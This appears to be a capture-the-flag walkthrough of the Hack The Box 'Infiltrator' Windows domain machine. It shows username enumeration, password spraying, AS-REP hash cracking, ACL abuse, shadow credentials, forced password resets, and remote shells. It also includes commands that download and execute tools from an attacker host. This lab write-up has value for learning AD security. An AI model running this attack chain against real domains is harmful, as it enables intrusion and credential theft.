Infiltrator
Recon
└─$ grep infil /etc/hosts
10.129.146.214 infiltrator.htb dc01.infiltrator.htb hostmaster.infiltrator.htb
DNS
└─$ dig ANY infiltrator.htb @10.10.11.31
; <<>> DiG 9.19.21-1-Debian <<>> ANY infiltrator.htb @10.10.11.31
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1593
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;infiltrator.htb. IN ANY
;; ANSWER SECTION:
infiltrator.htb. 600 IN A 10.10.11.31
infiltrator.htb. 3600 IN NS dc01.infiltrator.htb.
infiltrator.htb. 3600 IN SOA dc01.infiltrator.htb. hostmaster.infiltrator.htb. 417 900 600 86400 3600
;; ADDITIONAL SECTION:
dc01.infiltrator.htb. 3600 IN A 10.10.11.31
;; Query time: 84 msec
;; SERVER: 10.10.11.31#53(10.10.11.31) (TCP)
;; WHEN: Sat Aug 31 15:12:42 EDT 2024
;; MSG SIZE rcvd: 142
HTTP (80)

Subdomain and directory enumeration came up empty; the website is most likely just a static HTML site. Search, email and contact most probably don't work either.
Kerberos
> document.querySelectorAll('.author-item h4').forEach(e=>console.log(e.textContent))
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Kerbrute
namebuster was used to generate different username combinations for AD from the names scraped above.
└─$ namebuster usernames_web.txt > usernames.txt
└─$ kerbrute userenum ./usernames.txt -d infiltrator.htb --dc dc01.infiltrator.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/31/24 - Ronnie Flathers @ropnop
2024/08/31 15:50:56 > Using KDC(s):
2024/08/31 15:50:56 > dc01.infiltrator.htb:88
2024/08/31 15:50:57 > [+] VALID USERNAME: a.walker@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: a.WALKER@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: a.Walker@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: A.walker@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: A.Walker@infiltrator.htb
2024/08/31 15:50:57 > [+] VALID USERNAME: A.WALKER@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: m.harris@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: m.Harris@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: m.HARRIS@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: M.harris@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: M.HARRIS@infiltrator.htb
2024/08/31 15:50:59 > [+] VALID USERNAME: M.Harris@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: l.clark@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: l.CLARK@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: l.Clark@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: L.Clark@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: L.clark@infiltrator.htb
2024/08/31 15:51:01 > [+] VALID USERNAME: L.CLARK@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: e.rodriguez@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: e.Rodriguez@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: e.RODRIGUEZ@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: E.rodriguez@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: E.Rodriguez@infiltrator.htb
2024/08/31 15:51:02 > [+] VALID USERNAME: E.RODRIGUEZ@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: d.anderson@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: d.Anderson@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: d.ANDERSON@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: D.anderson@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: D.Anderson@infiltrator.htb
2024/08/31 15:51:04 > [+] VALID USERNAME: D.ANDERSON@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: o.martinez@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: o.Martinez@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: o.MARTINEZ@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: O.martinez@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: O.Martinez@infiltrator.htb
2024/08/31 15:51:06 > [+] VALID USERNAME: O.MARTINEZ@infiltrator.htb
2024/08/31 15:51:09 > [+] VALID USERNAME: K.turner@infiltrator.htb
2024/08/31 15:51:09 > [+] VALID USERNAME: K.Turner@infiltrator.htb
2024/08/31 15:51:09 > [+] VALID USERNAME: K.TURNER@infiltrator.htb
2024/08/31 15:51:12 > [+] VALID USERNAME: k.turner@infiltrator.htb
2024/08/31 15:51:12 > [+] VALID USERNAME: k.Turner@infiltrator.htb
2024/08/31 15:51:12 > [+] VALID USERNAME: k.TURNER@infiltrator.htb
2024/08/31 15:51:13 > Done! Tested 1512 usernames (42 valid) in 17.095 seconds
---
a.walker@infiltrator.htb
m.harris@infiltrator.htb
l.clark@infiltrator.htb
e.rodriguez@infiltrator.htb
d.anderson@infiltrator.htb
o.martinez@infiltrator.htb
k.turner@infiltrator.htb
AS-REP
Something interesting happens if we try to password spray!
└─$ kerbrute -v passwordspray ./usernames_unique.txt letmein -d infiltrator.htb --dc dc01.infiltrator.htb
Version: dev (n/a) - 08/31/24 - Ronnie Flathers @ropnop
2024/08/31 16:14:04 > Using KDC(s):
2024/08/31 16:14:04 > dc01.infiltrator.htb:88
2024/08/31 16:14:04 > [!] "" - Bad username: blank
2024/08/31 16:14:04 > [!] e.rodriguez@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] a.walker@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] k.turner@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] o.martinez@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] d.anderson@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] m.harris@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 > [!] l.clark@infiltrator.htb:letmein - Got AS-REP (no pre-auth) but couldn't decrypt - bad password
2024/08/31 16:14:04 > Done! Tested 7 logins (0 successes) in 0.310 seconds
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast
Get the hashes
└─$ impacket-GetNPUsers infiltrator.htb/ -usersfile usernames_unique.txt -format hashcat -outputfile hashes.asreproast
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
...
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:8024f9fd9e37b42ef8903235c8742d9c$e66a1249473ce462b90c7fe5b5da7626eaa5c71ac8983cb9b2ccaea11c818a9ea190fea5561ae3929bd590619512acb45cec1c96fec31650e32a05b1f172be0a91e9abeeff7731494f7f8f4df05e7ccb5e054b7d6701f6bb83fa6e8f7347493e33f8e28d268634795466fc3183f99c4699b1c9c4a504fb688bed125cf5e4cfc7aa4739a543c4b46874ee525301bf92120ceac08b900dd141740946fba507ae5d285499e301ca5b1dea9809aa653bf4ee26bcf0ffd5b11513e709b3070f41cb9c66324eb172eebd37ee56bced6531d3146a0c0d8387b7f42725cbe17804ef8747b7d7d8899bc4e3e9b5ceb869ecdd3b8f8845
...
Crack available hash
➜ .\hashcat.exe -m 18200 -a 0 .\hashes .\rockyou.txt
hashcat (v6.2.6) starting
...
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:8024f9fd9e37b42e...ecdd3b8f8845:WAT?watismypass!
Creds:
l.clark:WAT?watismypass!
SMB
Perform a RID brute-force just to be safe that we covered all users; evil-winrm didn't work with these creds.
└─$ netexec smb 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!' --shares --rid-brute
SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!
SMB 10.10.11.31 445 DC01 [*] Enumerated shares
SMB 10.10.11.31 445 DC01 Share Permissions Remark
SMB 10.10.11.31 445 DC01 ----- ----------- ------
SMB 10.10.11.31 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.31 445 DC01 C$ Default share
SMB 10.10.11.31 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.31 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.31 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.31 445 DC01 498: INFILTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 500: INFILTRATOR\Administrator (SidTypeUser)
SMB 10.10.11.31 445 DC01 501: INFILTRATOR\Guest (SidTypeUser)
SMB 10.10.11.31 445 DC01 502: INFILTRATOR\krbtgt (SidTypeUser)
SMB 10.10.11.31 445 DC01 512: INFILTRATOR\Domain Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 513: INFILTRATOR\Domain Users (SidTypeGroup)
SMB 10.10.11.31 445 DC01 514: INFILTRATOR\Domain Guests (SidTypeGroup)
SMB 10.10.11.31 445 DC01 515: INFILTRATOR\Domain Computers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 516: INFILTRATOR\Domain Controllers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 517: INFILTRATOR\Cert Publishers (SidTypeAlias)
SMB 10.10.11.31 445 DC01 518: INFILTRATOR\Schema Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 519: INFILTRATOR\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 520: INFILTRATOR\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.31 445 DC01 521: INFILTRATOR\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 522: INFILTRATOR\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 525: INFILTRATOR\Protected Users (SidTypeGroup)
SMB 10.10.11.31 445 DC01 526: INFILTRATOR\Key Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 527: INFILTRATOR\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.31 445 DC01 553: INFILTRATOR\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.31 445 DC01 571: INFILTRATOR\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.31 445 DC01 572: INFILTRATOR\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.31 445 DC01 1000: INFILTRATOR\DC01$ (SidTypeUser)
SMB 10.10.11.31 445 DC01 1101: INFILTRATOR\DnsAdmins (SidTypeAlias)
SMB 10.10.11.31 445 DC01 1102: INFILTRATOR\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1103: INFILTRATOR\D.anderson (SidTypeUser)
SMB 10.10.11.31 445 DC01 1104: INFILTRATOR\L.clark (SidTypeUser)
SMB 10.10.11.31 445 DC01 1105: INFILTRATOR\M.harris (SidTypeUser)
SMB 10.10.11.31 445 DC01 1106: INFILTRATOR\O.martinez (SidTypeUser)
SMB 10.10.11.31 445 DC01 1107: INFILTRATOR\A.walker (SidTypeUser)
SMB 10.10.11.31 445 DC01 1108: INFILTRATOR\K.turner (SidTypeUser)
SMB 10.10.11.31 445 DC01 1109: INFILTRATOR\E.rodriguez (SidTypeUser)
SMB 10.10.11.31 445 DC01 1111: INFILTRATOR\Chiefs Marketing (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1112: INFILTRATOR\Developers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1113: INFILTRATOR\Digital_Influencers (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1114: INFILTRATOR\Infiltrator_QA (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1115: INFILTRATOR\Marketing_Team (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1116: INFILTRATOR\Service_Management (SidTypeGroup)
SMB 10.10.11.31 445 DC01 1601: INFILTRATOR\winrm_svc (SidTypeUser)
SMB 10.10.11.31 445 DC01 3102: INFILTRATOR\infiltrator_svc$ (SidTypeUser)
LDAP
└─$ netexec ldap 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!' --active-users
SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.31 389 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!
LDAP 10.10.11.31 389 DC01 [*] Total records returned: 10, total 2 user(s) disabled
LDAP 10.10.11.31 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.11.31 389 DC01 Administrator 2024-08-21 19:58:28 0 Built-in account for administering the computer/domain
LDAP 10.10.11.31 389 DC01 D.anderson 2023-12-04 18:56:02 4
LDAP 10.10.11.31 389 DC01 L.clark 2023-12-04 19:04:24 0
LDAP 10.10.11.31 389 DC01 M.harris 2024-08-31 20:41:44 4
LDAP 10.10.11.31 389 DC01 O.martinez 2024-02-25 15:41:03 0
LDAP 10.10.11.31 389 DC01 A.walker 2023-12-05 22:06:28 4
LDAP 10.10.11.31 389 DC01 K.turner 2024-02-25 15:40:35 10 MessengerApp@Pass!
LDAP 10.10.11.31 389 DC01 E.rodriguez 2024-08-31 20:41:44 4
LDAP 10.10.11.31 389 DC01 winrm_svc 2024-08-02 22:42:45 4
LDAP 10.10.11.31 389 DC01 lan_managment 2024-08-02 22:42:46 4
Creds:
K.turner:MessengerApp@Pass!
For ??? (which service is unknown so far); it doesn't work for SMB!
└─$ netexec ldap 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!' -M get-desc-users
SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.31 389 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass!
GET-DESC... 10.10.11.31 389 DC01 [+] Found following users:
GET-DESC... 10.10.11.31 389 DC01 User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.31 389 DC01 User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.31 389 DC01 User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.31 389 DC01 User: K.turner description: MessengerApp@Pass!
GET-DESC... 10.10.11.31 389 DC01 User: infiltrator_svc$ description: dc01.infiltrator.htb
Another very useful command:
└─$ ldapdomaindump -u 'infiltrator.htb\l.clark' -p 'WAT?watismypass!' 10.10.11.31

Bloodhound
└─$ bloodhound-python -u 'l.clark@infiltrator.htb' -p 'WAT?watismypass!' -ns 10.10.11.31 -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip


Clark doesn't have anything interesting, but the group L.clark belongs to contains another user.
D.anderson.ccache
We are able to request Kerberos tickets, and not only for our own account: L.clark's password also works for D.anderson.
└─$ for username in $(<usernames_rid_brute.txt); do impacket-getTGT "infiltrator.htb/$username:WAT?watismypass\!" -dc-ip 10.10.11.31; done;
...
[*] Saving ticket in D.anderson.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in L.clark.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
...
└─$ export KRB5CCNAME=./kerberos/ccaches/D.anderson.ccache
└─$ klist
Ticket cache: FILE:./kerberos/ccaches/D.anderson.ccache
Default principal: D.anderson@INFILTRATOR.HTB
Valid starting Expires Service principal
09/01/2024 02:07:17 09/01/2024 06:07:17 krbtgt/INFILTRATOR.HTB@INFILTRATOR.HTB
renew until 09/01/2024 06:07:17



Chain of attack
After following the Outbound permissions on each connection we end up with a chain like:

dacledit
└─$ git clone https://github.com/fortra/impacket.git
└─$ venv
└─$ pip install -r requirements.txt
└─$ pip install -e .
└─$ py examples/dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'l.clark' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' -k -no-pass -dc-ip 10.10.11.31 infiltrator.htb/d.anderson
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240901-032305.bak
[*] DACL modified successfully!
Now the chain becomes:

pywhisker && certipy-ad
Same steps as on the Mist box.
└─$ pywhisker -d infiltrator.htb -u l.clark -p 'WAT?watismypass!' --target 'E.rodriguez' --action add
[*] Searching for the target account
[*] Target user found: CN=E.rodriguez,OU=Marketing Digital,DC=infiltrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 391786dd-eb48-a551-526b-8f5d55b3bebe
[*] Updating the msDS-KeyCredentialLink attribute of E.rodriguez
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: MR9B48eC.pfx
[*] Must be used with password: gc0BUPDvvbNmvrOaaDur
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
└─$ certipy-ad cert -pfx ./MR9B48eC.pfx -password 'gc0BUPDvvbNmvrOaaDur' -export -out rodriguez.pfx -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Loading PFX './MR9B48eC.pfx' with password None
[*] Writing PFX to 'rodriguez.pfx'
└─$ certipy-ad auth -pfx ./rodriguez.pfx -username 'E.rodriguez' -domain infiltrator.htb -dc-ip 10.10.11.31
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: e.rodriguez@infiltrator.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'e.rodriguez.ccache'
[*] Trying to retrieve NT hash for 'e.rodriguez'
[*] Got hash for 'e.rodriguez@infiltrator.htb': aad3b435b51404eeaad3b435b51404ee:b02e97f2fdb5c3d36f77375383449e56
└─$ netexec smb 10.10.11.31 -u 'e.rodriguez' -H 'b02e97f2fdb5c3d36f77375383449e56'
SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\e.rodriguez:b02e97f2fdb5c3d36f77375383449e56
AddSelf
AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals. (src: https://www.thehacker.recipes/ad/movement/dacl/addmember)
# bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"
└─$ bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "E.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" add groupMember "CHIEFS MARKETING" "e.rodriguez"
[+] e.rodriguez added to CHIEFS MARKETING
ForceChangePassword
https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
# bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
└─$ bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "E.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" set password "m.harris" "Password123$"
[+] Password changed successfully!
M.harris.ccache
└─$ impacket-getTGT "infiltrator.htb/M.harris:Password123$" -dc-ip 10.129.211.98
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Saving ticket in M.harris.ccache
└─$ export KRB5CCNAME=./kerberos/ccaches/M.harris.ccache
Due to some error in the HTB infrastructure the commands had to be executed quickly, so here they are as one batch:
bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "e.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" add groupMember "CHIEFS MARKETING" "e.rodriguez"
bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "e.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" set password "m.harris" "Password123$"
impacket-getTGT "infiltrator.htb/M.harris:Password123$"
mv M.harris.ccache kerberos/ccaches/
export KRB5CCNAME=$(readlink -f ./kerberos/ccaches/M.harris.ccache)
evil-winrm -i dc01.infiltrator.htb -r infiltrator.htb
Note: If you get `Cannot find KDC for realm "INFILTRATOR.HTB"`, you may need to update /etc/resolv.conf with the box IP (as the first entry) or /etc/krb5.conf.
evil-winrm (m.harris)
*Evil-WinRM* PS C:\Users\M.harris> tree /f /a
Folder PATH listing
Volume serial number is 96C7-B603
C:.
+---Desktop
| user.txt
User.txt
*Evil-WinRM* PS C:\Users\M.harris> cat Desktop/user.txt
8ac3296d7416bbe06c637e022103d00e
Privilege Escalation
Internal AD Enumeration
└─$ bloodhound-python -u 'm.harris@infiltrator.htb' -k -no-pass -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op harris
Password: # Enter anything; not sure why it prompts for a password with `-no-pass`
harris doesn't have any outbound permissions.
evil-winrm was very unstable for some reason, so I switched to ConPtyShell.
PS C:\users> whoami /all
User Name SID
==================== ==============================================
infiltrator\m.harris S-1-5-21-2606098828-3734741516-3625406802-1105
Group Name Type SID Attributes
=========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Protected Users Group S-1-5-21-2606098828-3734741516-3625406802-525 Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Developers Group S-1-5-21-2606098828-3734741516-3625406802-1112 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Enumerate with winPEAS
PS C:\users\M.harris\Music> iwr 10.10.14.43/wp.exe -out wp.exe
PS C:\users\M.harris\Music> .\wp.exe | Tee-Object -FilePath wp.log
...
+----------¦ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\M.harris\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 192B
...
+----------¦ Drives Information
+ Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 43 GB)(Permissions: Users [AppendData/CreateDirectories])
E:\ (Type: Fixed)
...
+----------¦ Checking KrbRelayUp
+ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (INFILTRATOR) so it could be vulnerable.
+ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
...
+ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
...
+----------¦ Enumerating machine and user certificate files
Issuer : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Subject :
ValidDate : 8/4/2024 11:48:15 AM
ExpiryDate : 7/17/2099 11:48:15 AM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : ABFD279830AC7B08DE25677B654BB7047D01F071
Template : Template=Kerberos Authentication(1.3.6.1.4.1.311.21.8.8884114.8852024.1722030.16302680.8225111.115.1.33), Major Version Number=110, Minor Version Number=2
Enhanced Key Usages
Client Authentication [*] Certificate is used for client authentication!
Server Authentication
Smart Card Logon
KDC Authentication
=================================================================================================
Issuer : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Subject : CN=dc01.infiltrator.htb
ValidDate : 12/7/2023 5:45:12 PM
ExpiryDate : 12/6/2024 5:45:12 PM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : 31154FCF64FBACACED5DEC9910EB0D1BB50F1F2C
Template : DomainController
Enhanced Key Usages
Client Authentication [*] Certificate is used for client authentication!
Server Authentication
=================================================================================================
Issuer : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
ValidDate : 12/7/2023 5:42:38 PM
ExpiryDate : 12/7/2028 5:52:38 PM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : 2C188207AE9DE454750081FACE0CFE730EAFAB65
=================================================================================================
Issuer : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
ValidDate : 12/7/2023 5:42:38 PM
ExpiryDate : 8/4/2124 11:55:57 AM
HasPrivateKey : True
StoreLocation : LocalMachine
KeyExportable : True
Thumbprint : 04A961BA417C7829B307CFBD46B2FB486BFD86C1
=================================================================================================
...
+----------¦ Searching hidden files or folders in C:\Users home (can be slow)
C:\Users\Default
C:\Users\All Users
C:\Users\All Users\ntuser.pol
C:\Users\Default User
C:\Users\Default
...
PS C:\users\M.harris\Music> IEX(IWR 10.10.14.43/adPEAS.ps1 -UseBasicParsing)
PS C:\users\M.harris\Music> Invoke-adPEAS
...
[?] +++++ Checking Add-Computer Permissions +++++
[+] Filtering found identities that can add a computer object to domain 'infiltrator.htb':
[!] The Machine Account Quota is currently set to 10
[!] Every member of group 'Authenticated Users' can add a computer to domain 'infiltrator.htb'
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=infiltrator,DC=htb
objectSid: S-1-5-11
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=infiltrator,DC=htb
CN=Certificate Service DCOM Access,CN=Builtin,DC=infiltrator,DC=htb
CN=Users,CN=Builtin,DC=infiltrator,DC=htb
...
[+] Found Active Directory Certificate Services 'infiltrator-DC01-CA':
CA Name: infiltrator-DC01-CA
CA dnshostname: dc01.infiltrator.htb
CA IP Address: 10.129.211.98
Date of Creation: 12/08/2023 01:52:38
DistinguishedName: CN=infiltrator-DC01-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
NTAuthCertificates: True
Available Templates: Infiltrator_Template
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
...
[?] +++++ Checking Template 'Infiltrator_Template' +++++
[!] Template 'Infiltrator_Template' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
[!] Identity 'INFILTRATOR\infiltrator_svc$' has 'CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner' permissions on template 'Infiltrator_Template'
[!] Identity 'Local System' has 'GenericAll' permissions on template 'Infiltrator_Template'
Template Name: Infiltrator_Template
Template distinguishedname: CN=Infiltrator_Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 09/01/2024 20:49:56
[+] Extended Key Usage: Smartcard Logon, Server Authentication, KDC Authentication, Client Authentication
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[!] Template Permissions: Local System : GenericAll
[!] Template Permissions: INFILTRATOR\infiltrator_svc$ : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
...
[?] +++++ Checking Template 'WebServer' +++++
[!] Template 'WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: WebServer
Template distinguishedname: CN=WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 12/08/2023 01:52:38
Extended Key Usage: Server Authentication
EnrollmentFlag: 0
